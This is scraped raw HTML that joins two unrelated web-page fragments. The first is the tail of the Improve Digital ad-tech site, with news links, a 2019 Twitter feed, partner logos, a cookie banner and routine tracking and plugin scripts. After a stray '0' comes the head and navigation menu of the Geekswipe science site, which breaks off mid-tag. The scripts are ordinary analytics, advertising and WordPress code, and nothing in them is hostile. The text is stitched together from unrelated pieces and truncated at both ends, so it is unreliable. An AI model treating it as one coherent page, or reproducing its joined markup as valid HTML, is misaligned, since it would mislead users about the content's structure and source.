class="container"> <div class="col-md-4 col-sm-4 col-xs-12"> <h3 class="footer_news"><a href="https://www.improvedigital.com/news/"> In The News </a></h3> <p><a href="https://www.improvedigital.com/press-releases/mark-de-weerd-countrymanager-bij-improve-digital/">Mark de Weerd countrymanager bij Improve Digital</a></p> <p><a href="https://www.improvedigital.com/press-releases/mark-de-weerd-country-manager-benelux/">Mark de Weerd gaat Improve Digital Benelux leiden</a></p> <p><a href="https://www.improvedigital.com/press-releases/mark-de-weerd-country-manager-benelux-improve-digital-2/">Mark de Weerd Country Manager Benelux Improve Digital</a></p> <p><a href="https://www.improvedigital.com/press-releases/mark-de-weerd-country-manager-benelux-improve-digital/">Mark de Weerd Country Manager Benelux Improve Digital</a></p> <p><a href="https://www.improvedigital.com/press-releases/improve-digital-koopt-widespace/">Improve Digital koopt Widespace</a></p> </div> <div class="col-md-4 col-sm-4 col-xs-12"> <h3 class="footer_twitter"><a href="https://twitter.com/improvedigital"> Twitter Feed</a> </h3> <aside id="kebo_twitter_feed_widget-2" class="widget kebo_twitter_feed_widget"> <ul class="kebo-tweets list light"> <li class="ktweet"> <div class="kmeta"> <a class="kaccount" href="https://twitter.com/ImproveDigital" target="_blank" rel="nofollow">@ImproveDigital</a> <a class="kdate" href="https://twitter.com/ImproveDigital/statuses/1126406008803405824" target="_blank" rel="nofollow"> <time title="Time posted: 09th May 2019 08:38:14" datetime="2019-05-09T08:38:14+00:00" aria-label="Posted on 09th May 2019 08:38:14">May 9, 2019</time> </a> </div> <p class="ktext"> We are <a href="http://twitter.com/thenextweb" rel="nofollow" target="_blank">@thenextweb</a> 2019 today and we are ready to witness what the future of <a href="http://twitter.com/search?q=%23tech" rel="nofollow" target="_blank">#tech</a> and <a href="http://twitter.com/search?q=%23digitalbusiness" rel="nofollow" target="_blank">#digitalbusiness</a> has in stor… <a href="https://twitter.com/i/web/status/1126406008803405824" rel="nofollow" target="_blank">twitter.com/i/web/status/1…</a> </p> <div class="kfooter"> <a class="kreply" title="Reply" href="https://twitter.com/intent/tweet?in_reply_to=1126406008803405824"></a> <a class="kretweet" title="Re-Tweet" href="https://twitter.com/intent/retweet?tweet_id=1126406008803405824"></a> <a class="kfavorite" title="Favorite" href="https://twitter.com/intent/favorite?tweet_id=1126406008803405824"></a> </div> </li> <li class="ktweet"> <div class="kmeta"> <a class="kaccount" href="https://twitter.com/ImproveDigital" target="_blank" rel="nofollow">@ImproveDigital</a> <a class="kdate" href="https://twitter.com/ImproveDigital/statuses/1120648698915110913" target="_blank" rel="nofollow"> <time title="Time posted: 23rd Apr 2019 11:20:45" datetime="2019-04-23T11:20:45+00:00" aria-label="Posted on 23rd Apr 2019 11:20:45">April 23, 2019</time> </a> </div> <p class="ktext"> Improve Digital’s Country Manager France, Philippe Guillemot, joined a discussion about header bidding’s impact on… <a href="https://twitter.com/i/web/status/1120648698915110913" rel="nofollow" target="_blank">twitter.com/i/web/status/1…</a> </p> <div class="kfooter"> <a class="kreply" title="Reply" href="https://twitter.com/intent/tweet?in_reply_to=1120648698915110913"></a> <a class="kretweet" title="Re-Tweet" href="https://twitter.com/intent/retweet?tweet_id=1120648698915110913"></a> <a class="kfavorite" title="Favorite" href="https://twitter.com/intent/favorite?tweet_id=1120648698915110913"></a> </div> </li> </ul> </aside> </div> <div id="contact-box" class="col-md-4 col-sm-4 col-xs-12"> <h3 class="footer_contact"><a href="https://www.improvedigital.com/contact/"> Get in touch</a> </h3> <p><a href="http://www.improvedigital.com/en/contact"> Contact us</a></p> <p class="footer_contact_details"><a href="https://www.improvedigital.com/join-us/">Join our team</a></p> <p><a href="http://www.improvedigital.com/brand-centre/">Brand Centre</a></p> <ul> <li><a class="twitter" href="https://twitter.com/improvedigital" target="_blank" rel="Noopener Noreferrer"></a></li> <li><a class="linkedin" href="https://www.linkedin.com/company/improve-digital" target="_blank" rel="Noopener Noreferrer"></a></li> <li><a class="facebook" href="https://www.facebook.com/Improve-Digital-104794536277798/" target="_blank" rel="Noopener Noreferrer"></a></li> <li><a class="instagram" href="https://www.instagram.com/improvedigital/" target="_blank" rel="Noopener Noreferrer"></a></li> <li><a class="youtube" href="https://www.youtube.com/channel/UCjYORqfz7i1ae3OsCgpoj2A" target="_blank" rel="Noopener Noreferrer"></a></li> </ul> </div> <!-- #colophon --> </div> </div> <div id="footer2_wrapp"> <div class="container"> <footer id="colophon" role="contentinfo"> <div class="row"> <a href="http://www.astia.org/" target="_blank" rel="Noopener Noreferrer" class="partner-logo col-md-2 col-sm-2 col-md-offset-3 col-sm-offset-1"><img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/footer/xpartners-astia1.png.pagespeed.ic.foU8JfRRTv.png" alt="ASTIA"></a> <a href="http://www.ukaop.org.uk/" target="_blank" rel="Noopener Noreferrer" class="partner-logo col-md-2 col-sm-2"><img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/footer/partners-aop.png" alt="AOP"></a> <a href="http://www.iab.net/" target="_blank" rel="Noopener Noreferrer" class="partner-logo col-md-1 col-sm-2"><img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/footer/partners-iab.png" alt="IAB"></a> <a href="http://www.improvedigital.com/de/improve-digital-unterzeichnet-den-bvdw-code-conduct-fuer-programmatic-advertising" target="_blank" rel="Noopener Noreferrer" class="partner-logo col-md-1 col-sm-2"><img class="img-responsive" src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/footer/bvdw1.png" alt="BVDW"></a> <!-- .site-info --> </div> <div class="footer-links"> <ul> <li><a href="http://www.improvedigital.com/en/disclaimer">Disclaimer</a></li> <li><a href="http://www.improvedigital.com/en/privacy-policy">Privacy Policy</a></li> <li><a href="http://www.improvedigital.com/en/platform-privacy-policy">Platform Privacy Policy</a></li> </ul> </div> <a href="https://www.azerion.com"> <img id="azerion-logo" class="img-responsive" src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/images/azerion_company.svg" width="200"/> </a> </footer> </div> </div><!-- end #footer2_wrapp --> <!-- Instagram Feed JS --> <script type="text/javascript">var sbiajaxurl="https://www.improvedigital.com/main/wp-admin/admin-ajax.php";</script> <script type="text/javascript">(function($){$("img.lazy").lazyload({effect:"fadeIn"});})(jQuery);</script> <link rel='stylesheet' id='yikes-inc-easy-mailchimp-public-styles-css' href='https://www.improvedigital.com/main/wp-content/plugins/yikes-inc-easy-mailchimp-extender/public/css/A.yikes-inc-easy-mailchimp-extender-public.min.css,qver=5.0.4.pagespeed.cf.4yQAK1lSn6.css' type='text/css' media='all'/> <style id='yikes-mailchimp-eu-frontend-compliance-styles-css' media='all'>label.yikes-mailchimp-eu-compliance-label p{margin-bottom:0}.yikes-mailchimp-eu-compliance-text,.yikes-mailchimp-eu-compliance-text :first-child{display:inline}</style> <link rel='stylesheet' id='kebo-twitter-plugin-css' href='https://www.improvedigital.com/main/wp-content/plugins/kebo-twitter-feed/css/plugin.css?ver=1.5.12' type='text/css' media='all'/> <script type='text/javascript'>//<![CDATA[ var cnArgs={"ajaxurl":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"7862400","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.46'></script> <script type='text/javascript'>//<![CDATA[ var ctf={"ajax_url":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/custom-twitter-feeds/js/ctf-scripts.js?ver=1.2.10'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/bootstrap/carousel.js?ver=5.0.4'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/bootstrap/collapse.js,qver=5.0.4.pagespeed.jm.B24L_OxIOT.js'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/video.js?ver=5.0.4'></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/google-maps-builder/vendor/wordimpress/maps-builder-core/assets/js/plugins//gmb-infobubble.min.js,qver=2.1.2.pagespeed.ce.w2nePH5MsK.js'></script> <script type='text/javascript'>//<![CDATA[ var gmb_data={"i18n":{"get_directions":"Get Directions","visit_website":"Visit Website"},"infobubble_args":{"shadowStyle":0,"padding":12,"backgroundColor":"rgb(255, 255, 255)","borderRadius":3,"arrowSize":15,"minHeight":20,"maxHeight":450,"minWidth":200,"maxWidth":350,"borderWidth":0,"disableAutoPan":false,"disableAnimation":true,"backgroundClassName":"gmb-infobubble","closeSrc":"https:\/\/www.google.com\/intl\/en_us\/mapfiles\/close.gif"}}; //]]></script> <script src="https://www.improvedigital.com/main/wp-content,_plugins,_google-maps-builder,_vendor,_wordimpress,_maps-builder-core,_assets,_js,_frontend,_google-maps-builder.min.js,qver==2.1.2+wp-content,_plugins,_google-maps-builder,_vendor,_wordimpress,_maps-builder-core,_includes,_libraries,_map-icons,_js,_map-icons.js,qver==2.1.2+wp-includes,_js,_wp-embed.min.js,qver==5.0.4.pagespeed.jc.kBJb3PZwyh.js"></script><script>eval(mod_pagespeed_lAeNDhln88);</script> <script>eval(mod_pagespeed_nc_qIjaTHo);</script> <script>eval(mod_pagespeed_FskAg01rhV);</script> <script type='text/javascript'>//<![CDATA[ var icl_vars={"current_language":"en","icl_home":"https:\/\/www.improvedigital.com\/","ajax_url":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php","url_type":"1"}; //]]></script> <script type='text/javascript'>//<![CDATA[ "use strict";var icl_lang=icl_vars.current_language;var icl_home=icl_vars.icl_home;function addLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func;}else{window.onload=function(){if(oldonload){oldonload();}func();}}} //]]></script> <script type='text/javascript'>//<![CDATA[ !function(n){n("body").on("submit",".yikes-easy-mc-form",function(){const s=n(this),i=s.find('input[name="eu-laws"]');s.on("yikes_clear_input_fields_after_successful_submission",function(){i.prop("checked",!1)})})}(jQuery); //]]></script> <script type='text/javascript'>//<![CDATA[ var yikes_mailchimp_ajax={"ajax_url":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php","page_data":"30764","interest_group_checkbox_error":"This field is required.","preloader_url":"https:\/\/www.improvedigital.com\/main\/wp-content\/plugins\/yikes-inc-easy-mailchimp-extender\/includes\/images\/ripple.svg","loading_dots":"https:\/\/www.improvedigital.com\/main\/wp-content\/plugins\/yikes-inc-easy-mailchimp-extender\/includes\/images\/bars.svg","ajax_security_nonce":"c12253efa3"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/yikes-inc-easy-mailchimp-extender/public/js/yikes-mc-ajax-forms.min.js,qver=6.5.0.pagespeed.ce.8eWBclQ2uH.js'></script> <script type='text/javascript'>//<![CDATA[ var form_submission_helpers={"ajax_url":"https:\/\/www.improvedigital.com\/main\/wp-admin\/admin-ajax.php","preloader_url":"https:\/\/www.improvedigital.com\/main\/wp-admin\/images\/wpspin_light.gif","countries_with_zip":{"US":"US","GB":"GB","CA":"CA","IE":"IE","CN":"CN","IN":"IN","AU":"AU","BR":"BR","MX":"MX","IT":"IT","NZ":"NZ","JP":"JP","FR":"FR","GR":"GR","DE":"DE","NL":"NL","PT":"PT","ES":"ES"},"page_data":"30764"}; //]]></script> <script type='text/javascript' src='https://www.improvedigital.com/main/wp-content/plugins/yikes-inc-easy-mailchimp-extender/public/js/form-submission-helpers.min.js,qver=6.5.0.pagespeed.ce.YQ9ERJZkvG.js'></script> <script type="text/javascript">//<![CDATA[ jQuery(document).ready(function(){jQuery('.ktweet .kfooter a:not(.ktogglemedia)').click(function(e){e.preventDefault();var khref=jQuery(this).attr('href');window.open(khref,'twitter','width=600, height=400, top=0, left=0');});}); //]]></script> <div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a> </div> </div><script type="text/javascript">jQuery(function($){$('.8436d00257-label.checkbox-parent-label').html('ARE YOU <strong>A PUBLISHER</strong>?');$('.7a37810530-label.checkbox-parent-label').html('ARE YOU <strong>A BUYER</strong>?');$(document).on('change','#mc_signup input[type="checkbox"]',function(){if(this.checked&&$(this).parent().hasClass('pubGroup')){$('#mc_signup .demandGroup input[type="checkbox"]').each(function(){$(this).attr('checked',false);})}else if(this.checked&&$(this).parent().hasClass('demandGroup')){$('#mc_signup .pubGroup input[type="checkbox"]').each(function(){$(this).attr('checked',false);})}})});</script> <script type="text/javascript">jQuery(function($){function carouselNormalization(){var items=$('#client_quotes .item'),heights=[],tallest;if(items.length){function normalizeHeights(){items.each(function(){heights.push($(this).height());});tallest=Math.max.apply(null,heights);items.each(function(){$(this).css('min-height',tallest+'px');});};normalizeHeights();$(window).on('resize orientationchange',function(){tallest=0,heights.length=0;items.each(function(){$(this).css('min-height','0');});normalizeHeights();});}}carouselNormalization();$.fn.visible=function(partial){var $t=$(this),$w=$(window),viewTop=$w.scrollTop(),viewBottom=viewTop+$w.height(),_top=$t.offset().top,_bottom=_top+$t.height(),compareTop=partial===true?_bottom:_top,compareBottom=partial===true?_top:_bottom;return((compareBottom<=viewBottom)&&(compareTop>=viewTop));};$(window).scroll(function(event){$(".animate-section").each(function(i,el){var el=$(el);if(el.visible(true)){el.addClass("come-in");}});});}) jQuery(document).ready(function(){var offset=250;var duration=300;jQuery(window).scroll(function(){if(jQuery(this).scrollTop()>offset){jQuery('.back-to-top').fadeIn(duration);}else{jQuery('.back-to-top').fadeOut(duration);}});jQuery('.back-to-top').click(function(event){event.preventDefault();jQuery('html, body').animate({scrollTop:0},duration);return false;})});</script> <script src="https://www.improvedigital.com/main/wp-content/themes/improvedigital-v2/assets/js/classie.js+uisearch.js.pagespeed.jc.AsCVgfUw54.js"></script><script>eval(mod_pagespeed_eTwYuHEOLn);</script> <script>eval(mod_pagespeed_uyx74h28Lg);</script> <script>new UISearch(document.getElementById('sb-search'));</script> <!-- Linkedin --> <script type="text/javascript">_linkedin_data_partner_id="16265";</script><script type="text/javascript">(function(){var s=document.getElementsByTagName("script")[0];var b=document.createElement("script");b.type="text/javascript";b.async=true;b.src="https://snap.licdn.com/li.lms-analytics/insight.min.js";s.parentNode.insertBefore(b,s);})();</script> <!-- end Linkedin --> <!-- Twitter universal website tag code --> <script>!function(e,n,u,a){e.twq||(a=e.twq=function(){a.exe?a.exe.apply(a,arguments):a.queue.push(arguments);},a.version='1',a.queue=[],t=n.createElement(u),t.async=!0,t.src='//static.ads-twitter.com/uwt.js',s=n.getElementsByTagName(u)[0],s.parentNode.insertBefore(t,s))}(window,document,'script');twq('init','nvd9v');twq('track','PageView');</script> <!-- End Twitter universal website tag code --> </body> </html><!-- WP Fastest Cache file was created in 0.149001121521 seconds, on 16-05-19 14:39:25 --><!-- via php -->
0
<!DOCTYPE html> <!-- ╔═╗╦ ╦╔╗╔╔═╗╔═╗╦ ╦╦═╗╔═╗ ║ ╚╦╝║║║║ ║╚═╗║ ║╠╦╝║╣ ╚═╝ ╩ ╝╚╝╚═╝╚═╝╚═╝╩╚═╚═╝ Version 1.1.0 — Pherkad 🎨 💻 🐼 Karthikeyan KC 📡 @karthikeyankc | @geekswipe | @swyde 💭 We need a lord of gradients! --> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://geekswipe.net/xmlrpc.php"> <link rel="apple-touch-icon" sizes="57x57" href="/apple-touch-icon-57x57.png"> <link rel="apple-touch-icon" sizes="60x60" href="/apple-touch-icon-60x60.png"> <link rel="apple-touch-icon" sizes="72x72" href="/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon-76x76.png"> <link rel="apple-touch-icon" sizes="114x114" href="/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="120x120" href="/apple-touch-icon-120x120.png"> <link rel="apple-touch-icon" sizes="144x144" href="/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="152x152" href="/apple-touch-icon-152x152.png"> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon-180x180.png"> <link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="/favicon-194x194.png" sizes="194x194"> <link rel="icon" type="image/png" href="/favicon-96x96.png" sizes="96x96"> <link rel="icon" type="image/png" href="/android-chrome-192x192.png" sizes="192x192"> <link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16"> <link rel="manifest" href="/manifest.json"> <meta name="msapplication-TileColor" content="#131313"> <meta name="msapplication-TileImage" content="/mstile-144x144.png"> <meta name="theme-color" content="#ffffff"> <meta name="google-site-verification" content="fz8iLgyccCxsGhIPCPmdRE3om8jDENhFkipCGh0adiI" /> <title>Geekswipe - Science, Technology, and Research</title> <script type="text/javascript"> var trackScrolling=false; var trackScrollingPercentage=false; var ScrollingPercentageNumber=25; var stLogInterval=10*1000; var cutOffTime=900; var trackNoEvents=false; var trackNoMaxTime=false; </script> <script>document.documentElement.className = document.documentElement.className.replace("no-js","js");</script> <!-- This site is optimized with the Yoast SEO plugin v11.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Geekswipe covers science, groundbreaking breakthroughs, essential technologies, and geek culture. We answer scientific questions and help humans to explore."/> <link rel="canonical" href="https://geekswipe.net/" /> <link rel="next" href="https://geekswipe.net/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Geekswipe" /> <meta property="og:description" content="Geekswipe covers science, groundbreaking breakthroughs, essential technologies and geek culture. We answer scientific questions and help humans to explore." /> <meta property="og:url" content="https://geekswipe.net/" /> <meta property="og:site_name" content="Geekswipe" /> <meta property="og:image" content="https://geekswipe.net/wp-content/uploads/2014/09/Geekswipe.jpg" /> <meta property="og:image:secure_url" content="https://geekswipe.net/wp-content/uploads/2014/09/Geekswipe.jpg" /> <meta property="og:image:width" content="1000" /> <meta property="og:image:height" content="550" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Geekswipe covers science, groundbreaking breakthroughs, essential technologies, and geek culture. We answer scientific questions and help humans to explore." /> <meta name="twitter:title" content="Geekswipe - Science, Technology, and Research" /> <meta name="twitter:site" content="@geekswipe" /> <meta name="twitter:image" content="http://geekswipe.net/wp-content/uploads/2014/09/Geekswipe.jpg" /> <meta name="msvalidate.01" content="9D849E7029E5AB640C6F75FDFC5C4DE8" /> <meta name="google-site-verification" content="UA-25940219-2" /> <meta name="yandex-verification" content="f7abf7b25031de16" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://geekswipe.net/#organization","name":"Geekswipe","url":"https://geekswipe.net/","sameAs":["http://www.facebook.com/Geekswipe","https://www.linkedin.com/company/geekswipe","https://twitter.com/geekswipe"],"logo":{"@type":"ImageObject","@id":"https://geekswipe.net/#logo","url":"https://geekswipe.net/wp-content/uploads/2015/10/Geekswipe-Logo-Square-LIGHT.png","width":500,"height":500,"caption":"Geekswipe"},"image":{"@id":"https://geekswipe.net/#logo"}},{"@type":"WebSite","@id":"https://geekswipe.net/#website","url":"https://geekswipe.net/","name":"Geekswipe","publisher":{"@id":"https://geekswipe.net/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://geekswipe.net/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://geekswipe.net/#webpage","url":"https://geekswipe.net/","inLanguage":"en-US","name":"Geekswipe - Science, Technology, and Research","isPartOf":{"@id":"https://geekswipe.net/#website"},"about":{"@id":"https://geekswipe.net/#organization"},"description":"Geekswipe covers science, groundbreaking breakthroughs, essential technologies, and geek culture. We answer scientific questions and help humans to explore."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Geekswipe &raquo; Feed" href="https://geekswipe.net/feed/" /> <link rel="alternate" type="application/rss+xml" title="Geekswipe &raquo; Comments Feed" href="https://geekswipe.net/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/geekswipe.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://geekswipe.net/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-lightbox-swipebox-css' href='https://geekswipe.net/wp-content/plugins/responsive-lightbox/assets/swipebox/css/swipebox.min.css?ver=2.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='style-css' href='https://geekswipe.net/wp-content/themes/cynosure/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-css' href='https://geekswipe.net/wp-content/themes/cynosure/responsive.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://geekswipe.net/wp-content/themes/cynosure/fonts/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='cyn-google-fonts-css' href='https://fonts.googleapis.com/css?family=Nunito%3A400%2C700&#038;ver=5.2' type='text/css' media='all' /> <script type='text/javascript' src='https://geekswipe.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://geekswipe.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/responsive-lightbox/assets/swipebox/js/jquery.swipebox.min.js?ver=2.1.0'></script> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/responsive-lightbox/assets/infinitescroll/infinite-scroll.pkgd.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var rlArgs = {"script":"swipebox","selector":"lightbox","customEvents":"","activeGalleries":"1","animation":"1","hideCloseButtonOnMobile":"0","removeBarsOnMobile":"0","hideBars":"1","hideBarsDelay":"5000","videoMaxWidth":"1080","useSVG":"1","loopAtEnd":"0","woocommerce_gallery":"0","ajaxurl":"https:\/\/geekswipe.net\/wp-admin\/admin-ajax.php","nonce":"6d496c653b"}; /* ]]> */ </script> <script type='text/javascript' src='https://geekswipe.net/wp-content/plugins/responsive-lightbox/js/front.js?ver=2.1.0'></script> <script type='text/javascript' src='https://geekswipe.net/wp-content/themes/cynosure/js/jquery.flexslider.min.js?ver=5.2'></script> <link rel='https://api.w.org/' href='https://geekswipe.net/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://geekswipe.net/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://geekswipe.net/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <!--[if lt IE 9]> <script src="https://geekswipe.net/wp-content/themes/cynosure/js/ie/html5.js"></script> <script src="https://geekswipe.net/wp-content/themes/cynosure/js/ie/selectivizr.js"></script> <![endif]--> <!--Google Analytics--> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-25940219-2', 'auto'); ga('send', 'pageview'); </script> <!--Google Analytics--> </head> <body class="home blog col-3cm full-width topbar-enabled"> <div id="wrapper"> <header id="header" class="group"> <!--Page Level Ads--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-9460485641009814", enable_page_level_ads: true }); </script> <!--Page Level Ads--> <nav class="nav-container group" id="nav-topbar"> <div class="nav-toggle"><i class="fa fa-bars"></i></div> <div class="nav-text"><!-- put your mobile menu text here --></div> <div class="nav-wrap container"><ul id="menu-main-menu" class="nav container-inner group"><li id="menu-item-4779" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4779"><a href="https://geekswipe.net/science/">Science</a> <ul class="sub-menu"> <li id="menu-item-4780" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4780"><a href="https://geekswipe.net/science/astronomy/">Astronomy</a></li> <li id="menu-item-4781" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4781"><a href="https://geekswipe.net/science/biology/">Biology</a></li> <li id="menu-item-4782" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4782"><a href="https://geekswipe.net/science/chemistry/">Chemistry</a></li> <li id="menu-item-4783" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4783"><a href="https://geekswipe.net/science/physics/">Physics</a></li> </ul> </li> <li id="menu-item-4788" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4788"><a href="https://geekswipe.net/technology/">Technology</a> <ul class="sub-menu"> <li id="menu-item-4789" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4789"><a href="https://geekswipe.net/technology/aerospace/">Aerospace</a></li> <li id="menu-item-4790" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4790"><a href="https://geekswipe.net/technology/computing/">Computing</a></li> <li id="menu-item-4791" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4791"><a href="https://geekswipe.net/technology/electronics/">Electronics</a></li> <li id="menu-item-4792" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4792"><a href="https://geekswipe.net/technology/energy/">Energy</a></li> <li id="menu-item-4793" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4793"><a href="https://geekswipe.net/technology/transport/">Transport</a></li> </ul> </li> <li id="menu-item-4774" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-4774"><a href="https://geekswipe.net/research/">Research</a> <ul class="sub-menu"> <li id="menu-item-4775" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4775"><a href="https://geekswipe.net/research/cognitive-science/">Cognitive Science</a></li> <li id="menu-item-4776" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4776"><a href="https://geekswipe.net/research/engineering/">Engineering</a></li> <li id="menu-item-4777" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4777"><a href="https://geekswipe.net/research/medicine/">Medicine</a></li> <li id="menu-item-4778" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-4778"><a href="https://geekswipe.net/research/nature/">Nature</a></li> </ul> </li> <li id="menu-item-4769" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children 